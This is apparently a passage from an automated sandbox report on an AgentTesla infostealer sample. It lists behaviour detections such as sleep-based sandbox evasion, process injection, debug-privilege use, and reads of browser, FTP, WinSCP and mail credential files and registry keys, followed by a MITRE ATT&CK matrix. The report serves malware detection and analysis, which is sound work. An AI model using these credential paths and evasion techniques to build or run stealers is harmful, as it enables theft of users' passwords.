Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -43124s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -42906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -42718s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -41812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -41624s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -41312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -41124s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -40718s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -40218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -40000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -39624s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -39406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -39124s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -38906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -38312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -37624s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -37218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -35906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -35406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -35218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -34812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -51936s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -34124s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -33718s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -33218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -32624s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -31312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -31124s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -30218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -48124s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -47812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -47624s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -47406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -46718s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -45906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -42124s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -38624s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -36812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -36624s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -36406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe TID: 908	Thread sleep time: -35718s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe TID: 6028	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe TID: 476	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe TID: 968	Thread sleep count: 42 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe TID: 968	Thread sleep count: 651 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe TID: 476	Thread sleep time: -49282s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe TID: 476	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe TID: 476	Thread sleep time: -58906s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe TID: 476	Thread sleep time: -55626s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe TID: 476	Thread sleep time: -55406s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe TID: 476	Thread sleep time: -55220s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe TID: 476	Thread sleep time: -53220s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe TID: 1764	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe TID: 5148	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe TID: 380	Thread sleep count: 466 > 30
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe TID: 5148	Thread sleep time: -30000s >= -30000s

Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\jF6LSw9bnC.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\jF6LSw9bnC.exe

Code function: 3_2_0667CFC6 KiUserExceptionDispatcher,BuildReasonArray,DwmGetRemoteSessionOcclusionState,PeekMessageA,PrivateExtractIconsW,KiUserExceptionDispatcher,LdrInitializeThunk,

3_2_0667CFC6

Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Code function: 12_2_054C01CB mov eax, dword ptr fs:[00000030h]	12_2_054C01CB
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Code function: 12_2_054C00AD mov ecx, dword ptr fs:[00000030h]	12_2_054C00AD
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Code function: 12_2_054C00AD mov eax, dword ptr fs:[00000030h]	12_2_054C00AD

Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\jF6LSw9bnC.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Section loaded: unknown target: C:\Users\user\Desktop\jF6LSw9bnC.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Section loaded: unknown target: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Section loaded: unknown target: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe protection: execute and read and write

Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process created: C:\Users\user\Desktop\jF6LSw9bnC.exe jF6LSw9bnC.exe	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process created: C:\Users\user\Desktop\jF6LSw9bnC.exe jF6LSw9bnC.exe	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process created: C:\Users\user\Desktop\jF6LSw9bnC.exe jF6LSw9bnC.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process created: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe YYtJku.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process created: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe YYtJku.exe
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process created: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe YYtJku.exe

Source: jF6LSw9bnC.exe, 00000003.00000002.474315626.0000000001C90000.00000002.00000001.sdmp, YYtJku.exe, 0000000D.00000002.473932419.0000000001A00000.00000002.00000001.sdmp, YYtJku.exe, 00000010.00000002.473728152.0000000001CC0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: jF6LSw9bnC.exe, 00000003.00000002.474315626.0000000001C90000.00000002.00000001.sdmp, YYtJku.exe, 0000000D.00000002.473932419.0000000001A00000.00000002.00000001.sdmp, YYtJku.exe, 00000010.00000002.473728152.0000000001CC0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: jF6LSw9bnC.exe, 00000003.00000002.474315626.0000000001C90000.00000002.00000001.sdmp, YYtJku.exe, 0000000D.00000002.473932419.0000000001A00000.00000002.00000001.sdmp, YYtJku.exe, 00000010.00000002.473728152.0000000001CC0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: jF6LSw9bnC.exe, 00000003.00000002.474315626.0000000001C90000.00000002.00000001.sdmp, YYtJku.exe, 0000000D.00000002.473932419.0000000001A00000.00000002.00000001.sdmp, YYtJku.exe, 00000010.00000002.473728152.0000000001CC0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Queries volume information: C:\Users\user\Desktop\jF6LSw9bnC.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Queries volume information: C:\Users\user\Desktop\jF6LSw9bnC.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Queries volume information: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Queries volume information: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Queries volume information: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Queries volume information: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation

Source: C:\Users\user\Desktop\jF6LSw9bnC.exe

Code function: 3_2_06675A94 GetUserNameW,

3_2_06675A94

Source: C:\Users\user\Desktop\jF6LSw9bnC.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000010.00000002.469149092.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.212487577.0000000005CE5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.475373692.0000000003391000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.334212460.00000000058F5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.474483881.0000000002F91000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.224466566.0000000005CE5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.304664651.000000000117A000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.469108481.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.224130542.00000000059A2000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.334155127.0000000005812000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.474773451.0000000003471000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.307682957.0000000004B54000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.308785428.00000000056C2000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.469106569.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.332958672.0000000004B64000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.223257236.0000000005044000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: YYtJku.exe PID: 6124, type: MEMORY
Source: Yara match	File source: Process Memory Space: YYtJku.exe PID: 5940, type: MEMORY
Source: Yara match	File source: Process Memory Space: jF6LSw9bnC.exe PID: 5888, type: MEMORY
Source: Yara match	File source: Process Memory Space: YYtJku.exe PID: 4260, type: MEMORY
Source: Yara match	File source: Process Memory Space: YYtJku.exe PID: 5004, type: MEMORY
Source: Yara match	File source: Process Memory Space: jF6LSw9bnC.exe PID: 5864, type: MEMORY
Source: Yara match	File source: 13.2.YYtJku.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.YYtJku.exe.5810000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jF6LSw9bnC.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.YYtJku.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.YYtJku.exe.56c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.jF6LSw9bnC.exe.59a0000.1.unpack, type: UNPACKEDPE

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Show sources

Source: C:\Users\user\Desktop\jF6LSw9bnC.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini			Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior

Tries to harvest and steal ftp login credentials

Show sources

Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\			Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml			Jump to behavior

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: Yara match	File source: 00000003.00000002.475373692.0000000003391000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.474483881.0000000002F91000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.474773451.0000000003471000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: YYtJku.exe PID: 6124, type: MEMORY
Source: Yara match	File source: Process Memory Space: jF6LSw9bnC.exe PID: 5888, type: MEMORY
Source: Yara match	File source: Process Memory Space: YYtJku.exe PID: 4260, type: MEMORY

Remote Access Functionality:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000010.00000002.469149092.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.212487577.0000000005CE5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.475373692.0000000003391000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.334212460.00000000058F5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.474483881.0000000002F91000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.224466566.0000000005CE5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.304664651.000000000117A000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.469108481.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.224130542.00000000059A2000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.334155127.0000000005812000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.474773451.0000000003471000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.307682957.0000000004B54000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.308785428.00000000056C2000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.469106569.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.332958672.0000000004B64000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.223257236.0000000005044000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: YYtJku.exe PID: 6124, type: MEMORY
Source: Yara match	File source: Process Memory Space: YYtJku.exe PID: 5940, type: MEMORY
Source: Yara match	File source: Process Memory Space: jF6LSw9bnC.exe PID: 5888, type: MEMORY
Source: Yara match	File source: Process Memory Space: YYtJku.exe PID: 4260, type: MEMORY
Source: Yara match	File source: Process Memory Space: YYtJku.exe PID: 5004, type: MEMORY
Source: Yara match	File source: Process Memory Space: jF6LSw9bnC.exe PID: 5864, type: MEMORY
Source: Yara match	File source: 13.2.YYtJku.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.YYtJku.exe.5810000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jF6LSw9bnC.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.YYtJku.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.YYtJku.exe.56c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.jF6LSw9bnC.exe.59a0000.1.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation211	Registry Run Keys / Startup Folder1	Process Injection112	Disable or Modify Tools1	OS Credential Dumping2	Account Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Registry Run Keys / Startup Folder1	Obfuscated Files or Information2	Credentials in Registry1	System Information Discovery114	Remote Desktop Protocol	Data from Local System2	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Software Packing3	Security Account Manager	Security Software Discovery21	SMB/Windows Admin Shares	Email Collection1	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Masquerading11	NTDS	Virtualization/Sandbox Evasion13	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol11	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Virtualization/Sandbox Evasion13	LSA Secrets	Process Discovery2	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Process Injection112	Cached Domain Credentials	Application Window Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Hidden Files and Directories1	DCSync	System Owner/User Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	Remote System Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
